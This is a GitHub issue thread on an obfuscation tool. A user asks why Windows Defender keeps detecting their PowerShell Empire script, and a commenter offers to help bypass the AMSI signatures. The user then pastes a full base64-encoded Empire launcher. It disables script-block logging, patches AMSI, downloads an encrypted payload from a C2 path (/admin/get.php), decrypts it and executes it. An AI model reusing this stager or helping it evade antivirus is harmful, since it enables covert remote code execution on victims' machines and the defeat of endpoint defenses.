### ISSUE TITLE
Defender Windows problem

### ISSUE THREAD

**Issue by protocolic** [danielbohannon/Invoke-Obfuscation#39]
I'm generating script in PowerShell Empire. Many times tried to do obfuscation code with different keys but every time Defender Windows 4.18.1807.18075 detected my code as Trojan: Win32 / armsitaper, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3aWin32%2fAmsiTamper.A!ams&threatid=2147728399&enterprise=0 . Maybe there is some nuance in ofscale code? Is there a solution to this problem? I want to clarify that the detection occurs during the execution of the script.

**Comment by cobbr** [comment]
Hey @protocolic, sounds like you are running into problems w/ AMSI! I would suggest reading up on the [AMSI](https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal). 

I'd probably need a lot more detail on what code you are trying to obfuscate, and what obfuscation options you are using in order to figure out why you are having trouble bypassing the AMSI signatures.

**Comment by protocolic** [comment]
Thanks for the help.
Yes, the problem with AMSI. My tokens when obfuscated token\all\1. 
My code in Base64:

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAUwBpAE8ATgBUAGEAQgBMAEUALgBQAFMAVgBlAFIAUwBpAG8AbgAuAE0AQQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJAA0AEMARgAyADEAPQBbAHIAZQBGAF0ALgBBAHMAcwBlAE0AQgBsAHkALgBHAEUAdABUAFkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBlAHQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQANABDAEYAMgAxACkAewAkAEUAMwBDAEUAOQA9ACQANABjAGYAMgAxAC4ARwBFAFQAVgBhAEwAdQBFACgAJABOAHUAbABMACkAOwBJAEYAKAAkAEUAMwBDAGUAOQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkAGUAMwBjAEUAOQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABFADMAQwBFADkAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEATAA9AFsAQwBPAGwATABFAEMAVABJAG8ATgBTAC4ARwBFAE4AZQByAGkAYwAuAEQASQBjAFQAaQBPAE4AYQByAHkAWwBzAHQAUgBpAE4ARwAsAFMAWQBzAHQARQBNAC4ATwBiAEoARQBDAHQAXQBdADoAOgBOAGUAVwAoACkAOwAkAHYAYQBsAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQARQAzAGMARQA5AFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBMAH0ARQBMAHMARQB7AFsAUwBjAHIAaQBQAFQAQgBMAG8AQwBLAF0ALgAiAEcAZQB0AEYAaQBFAGAATABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbAB1AGUAKAAkAE4AdQBsAGwALAAoAE4ARQB3AC0ATwBiAGoARQBDAFQAIABDAG8AbABsAGUAYwB0AEkATwBuAFMALgBHAGUATgBlAFIASQBDAC4ASABhAFMASABTAGUAdABbAFMAVAByAEkAbgBnAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAEYAXQAuAEEAcwBzAEUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBFAHQARgBJAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AGUAKAAkAE4AdQBsAEwALAAkAFQAUgB1AEUAKQA7AH0AOwBbAFMAWQBTAFQAZQBNAC4ATgBlAHQALgBTAEUAUgBWAEkAQwBFAFAATwBJAE4AdABNAGEATgBBAEcAZQByAF0AOgA6AEUAWABQAGUAQwB0ADEAMAAwAEMATwBuAFQASQBOAHUARQA9ADAAOwAkADQANwAyAEMANAA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwB0AEUAbQAuAE4ARQB0AC4AVwBFAGIAQwBsAEkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAA0ADcAMgBjADQALgBIAGUAQQBEAEUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAA0ADcAMgBDADQALgBQAHIAbwB4AHkAPQBbAFMAWQBzAHQAZQBtAC4ATgBFAFQALgBXAGUAQgBSAGUAUQBVAEUAcwBUAF0AOgA6AEQAZQBGAEEAdQBsAFQAVwBFAEIAUAByAE8AWABZADsAJAA0ADcAMgBDADQALgBQAFIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AEkAYQBsAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAEUARABlAE4AdABJAGEATABDAGEAQwBoAEUAXQA6ADoARABFAEYAYQBVAEwAdABOAGUAVAB3AE8AcgBLAEMAUgBlAGQAZQBOAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAA0ADcAMgBjADQALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBNAC4AVABlAHgAdAAuAEUAbgBDAG8ARABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAEUAdABCAFkAdABFAFMAKAAnADEAewBSAEgAKgBsAD8AbwBoADAAQgBzAF4ASQArAGIAZAA7AEAAYQA3AEEAPgBHACkAVwBGACgAZQA4AFsAIwAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwBVAE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHMAZQByAD0AJAAoAFsAVABFAHgAVAAuAEUAbgBDAE8AZABJAE4AZwBdADoAOgBVAG4ASQBDAE8ARABlAC4ARwBlAFQAUwB0AFIAaQBuAGcAKABbAEMAbwBOAHYAZQByAHQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABTAFQAUgBJAG4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgB3AEEAdQBBAEQAQQBBAEwAZwBBAHcAQQBDADQAQQBNAFEAQQA2AEEARABNAEEATgBRAEEAMABBAEQAWQBBACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAA0ADcAMgBjADQALgBIAEUAQQBkAGUAcgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAEcAawBXAFEAZABDAFQAPQAyAGIAbQBHADMAbQAzADAAdABCADIAZgB4AGQAcwBIAE4AZQB5AGgAaAB3AG8AbwAxAHIAWQA9ADsAIgApADsAJABkAGEAVABhAD0AJAA0ADcAMgBDADQALgBEAE8AVwBuAGwAbwBhAEQARABBAFQAQQAoACQAUwBFAFIAKwAkAHQAKQA7ACQASQBWAD0AJABEAGEAdABhAFsAMAAuAC4AMwBdADsAJABEAGEAdABhAD0AJABkAGEAVABBAFsANAAuAC4AJABEAGEAdABhAC4AbABlAG4ARwB0AGgAXQA7AC0AagBPAEkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
